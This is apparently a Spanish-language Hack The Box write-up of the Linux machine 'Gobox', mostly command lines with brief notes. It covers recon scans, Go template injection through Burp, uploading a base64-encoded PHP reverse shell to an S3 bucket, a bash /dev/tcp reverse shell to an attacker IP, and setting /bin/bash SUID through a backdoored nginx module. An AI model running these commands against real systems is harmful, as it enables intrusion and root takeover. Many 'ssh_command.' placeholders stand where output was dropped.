Gobox

Gobox


HTB Linux

nmap -A -p- -oA gobox 10.129.95.236 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA gobox 10.129.95.236

nmap -sU -O -p- -oA gobox-udp 10.129.95.236

nikto -h 10.129.95.236:80

ssh_command.

ssh_command.

whatweb http://10.129.95.236:8080

ssh_command.

Nos dirigimos a http://10.129.95.236

ssh_command.

Nos vamos a http://10.129.95.236:8080/forgot

ssh_command.

Abrimos burpsuite y introducimos credenciales admin admin

Cambiamos email={{.Email}}

Vemos que sale ippsec@hacking.esports

ssh_command.

Tratamos ahora con lo siguiente

email={{.}}

ssh_command.

Hacemos el siguiente script para poder hacer un shell.

ssh_command.

hostname

which aws

aws s3 ls

aws s3 ls s3://website

ssh_command.

Creamos un archivo data con el reverse shell en php

cat data | base64 -w 0

echo PD9waHak…/Pgo= | base64 -d > /tmp/reverse.php

ssh_command.

aws s3 cp /tmp/reverse.php s3://website/reverse.php

ssh_command.

Nos dirigimos a la pagina a ver si podemos hacer un reverse shell

http://10.129.95.236/reverse.php?cmd=bash -c “bash -i >& /dev/tcp/10.10.14.53/443 0>&1”

nc -lvnp 443

ssh_command.

cd home/ubuntu && cat user.txt

ssh_command.

uname -a

lsb_release -a

ssh_command.

cd /usr/lib/modules

curl “http://localhost:8000/?iippsec.run[whoami]”

curl “http://localhost:8000/?iippsec.run[chmod%204755%20%2fbin%2fbash]”

Despues de unos minutos

bash -p

ssh_command.

© 2025 Cu3rv0x